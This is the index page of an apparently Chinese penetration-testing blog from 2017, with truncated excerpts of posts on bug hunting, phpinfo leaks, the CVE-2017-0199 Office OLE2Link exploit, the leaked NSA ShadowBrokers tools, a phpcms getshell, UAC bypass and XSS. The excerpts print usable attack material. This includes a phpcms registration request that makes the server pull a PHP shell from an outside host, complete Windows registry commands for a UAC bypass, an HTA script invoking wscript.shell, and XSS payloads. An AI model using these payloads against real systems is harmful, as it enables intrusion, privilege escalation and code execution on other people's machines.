漏洞挖掘经验分享

2017-4-29 webbaozi 渗透测试

我平时挖洞的经验,我总结了一下,大概有以下几点: 1、收集信息,尽可能的越多越好(主域名、IP段、搜索引擎、GitHub等)。 2、收集好信息后,对收集的信息进行一些扩展,增加信息收集的量(可以用SubDomain工具批量收集厂商域名信息,域名对应IP,数据多了之后,就可以拿来分析域名的真实地址、以及潜在的IP段)。 3、对IP段、子域名等进行大量破解,这里我们要经常收集一些SRC开发常用的端口、以及一些域名的命名习惯(GitHub上面有很多现成的端口,平时收集信息的时候,可以多注意一下)。 4、收集对方的邮箱账号命名习惯(因为好多官方后台都是用...

阅读全文>>

标签: 漏洞挖掘

评论(0) 浏览(6)

从phpinfo中能获取哪些敏感信息

2017-4-23 webbaozi 渗透测试

phpinfo()想必的最熟悉的了,在搭建环境之后都会随后写一个phpinfo()来测试环境是否正常,很多人测试完毕忘记删除就开始部署环境了,这就造成了一些敏感信息的泄漏。那么我们能从phpinfo()中获得哪些敏感信息呢?php版本这种就不用说了,来看一下泄漏了哪些比较敏感的信息。 一、绝对路径(_SERVER[“SCRIPT_FILENAME”]) 这个是最常用,也是最有效的一个办法,找到phpinfo()页面可以直接找到网站的绝对路径,对于写shell和信息搜集是必不可少的。 二、支持的程序 可以通过phpinfo()查...

阅读全文>>

标签: phpinfo

评论(0) 浏览(38)

CVE-2017-0199 OFFICE OLE2LINK漏洞利用详解

2017-4-18 webbaozi 渗透测试

漏洞概述 fireeye最近公布了一个OFFICE 0day,在无需用户交互的情况下,打开word文档就可以通过hta脚本执行任意代码。经过研究发现,此漏洞的成因主要是word在处理内嵌OLE2LINK对象时,通过网络更新对象时没有正确处理的Content-Type所导致的一个逻辑漏洞。 漏洞利用方法 首先准备一台apache服务器,web根目录下保存一个1.rtf文件,内容如下: test789 <script> var objShell = new ActiveXObject("wscript.shell"); objSh...

阅读全文>>

标签: office

评论(0) 浏览(133)

ShadowBrokers 泄漏的美国 NSA 黑客工具包下载地址及复现

2017-4-16 webbaozi 渗透测试

方程式0day的下载地址: https://github.com/misterch0c/shadowbroker 本次公开的工具包中,包含多个 Windows 漏洞的利用工具,只要Windows服务器开了25、88、139、445、3389 等端口之一,就有可能被黑客攻击,其中影响尤为严重的是445和3389端口。 复现过程,收集的网上的(自己电脑太差,虚拟机运行不了那么多。so,看看网上的吧) 方程式 0day ETERNALBLUE  复现过程 视频教程 ETERNALBLUE 本地复...

阅读全文>>

标签: 方程式

评论(0) 浏览(124)

phpcms前台getshell(附:注入)

2017-4-10 webbaozi 渗透测试

1.phpcms文件上传,需要网站开启注册功能 http://192.168.107.138/phpcms/index.php?m=member&c=index&a=register&siteid=1 POST:siteid=1&modelid=11&username=123456&password=123456&email=123456@qq.com&info[content]=<img src=http://www.webbaozi.com/phpcmsv9/v9.txt?.php#.jpg>...

阅读全文>>

标签: phpcms

评论(0) 浏览(187)

bypassuac收集

2017-4-8 webbaozi 个人笔记

window10: reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\App Paths\control.exe" /t REG_SZ /d %COMSPEC% /f sdclt reg delete "HKCU\Software\Microsoft\Windows\CurrentVersion\App Paths\control.exe" /f

阅读全文>>

标签: bypassuac

评论(0) 浏览(95)

XSS Payload 收集(约有 1500 左右)

2017-4-1 webbaozi 个人笔记

<META onpaonpageonpagonpageonpageshowshoweshowshowgeshow="alert(1)"; <IMG SRC=x > <INPUT TYPE="BUTTON" action="alert('XSS')"/> "><h1><IFRAME SRC="javascript:alert('XSS');"></IFRAME>">123</h1> "><h1><IFRAME SRC=# ></IFRAME>123</...

阅读全文>>

标签: xss

评论(1) 浏览(153)

Powered by emlog 蜀ICP备16032848号-1